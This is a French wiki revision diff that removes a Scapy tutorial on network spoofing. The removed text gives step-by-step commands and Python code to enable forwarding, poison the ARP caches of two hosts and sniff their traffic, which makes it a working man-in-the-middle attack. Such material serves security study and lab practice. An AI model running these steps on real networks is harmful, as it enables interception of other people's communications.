Différences

Ci-dessous, les différences entre deux révisions de la page.

--- python:scapy:network_spoofing [2021/04/04 17:01] – modification externe 127.0.0.1
+++ python:scapy:network_spoofing [2024/07/27 18:15] (Version actuelle) – removing (moved to scapy page) phsw
@@ Ligne 1: / Ligne 1: @@
-====== Spoofer le réseau avec Scapy ======
-Récupérer le trafic entre les machines A et B:
-  - Activer le routage des paquets: <code bash>sudo sysctl net/ipv4/ip_forward=1</code> et désactiver les redirections de politesse: <code bash>sudo sysctl net/ipv4/conf/all/send_redirects=0</code>
-  - Adapter le parefeu (pas de règles bizarres), notamment autoriser le forwarding: <code bash>sudo iptables -P FORWARD ACCEPT</code>
-  - Récupérer les adresses MAC des adresses IP A et B: <code python>
-srp1(Ether(dst=ETHER_BROADCAST)/ARP(pdst="<ip A>",psrc="<ip pirate>"))
-srp1(Ether(dst=ETHER_BROADCAST)/ARP(pdst="<ip B>",psrc="<ip pirate>"))
-</code>L'adresse MAC se trouve dans le champ ''src'' de la trame Ethernet.
-  - Cache-poisoning des tables ARP de A et B: <code python>
-sendp(Ether(src="<mac pirate>",dst="<mac B>")/ARP(op="who-has",psrc="<ip A>",pdst="<ip B>"), inter=1, loop=1)
-sendp(Ether(src="<mac pirate>",dst="<mac A>")/ARP(op="who-has",psrc="<ip B>",pdst="<ip A>"), inter=1, loop=1)
-</code>Si on met ''inter=RandNum(10, 40)'' , l'intervalle de temps varie entre 10 et 40 secondes (pas obligatoire), ''loop=1'' lance l'exécution en boucle.
-  - Sniffer le réseau:<code python>pkts = sniff(filter="host <ipA> or host <ipB>", prn=lambda p: p.summary)</code>
-Astuce: pour éviter de lancer deux instances de Scapy pour corrompre les tables:
-<code python>
-pkts = [Ether(src="<mac pirate>",dst="<mac B>")/ARP(op="who-has",psrc="<ip A>",pdst="<ip B>"), Ether(src="<mac pirate>",dst="<mac A>")/ARP(op="who-has",psrc="<ip B>",pdst="<ip A>")]
-srploop(pkts, inter=1, store=False)
-</code>
-''store=False'' permet d'éviter de stocker en mémoire les paquets, pour préserver la RAM.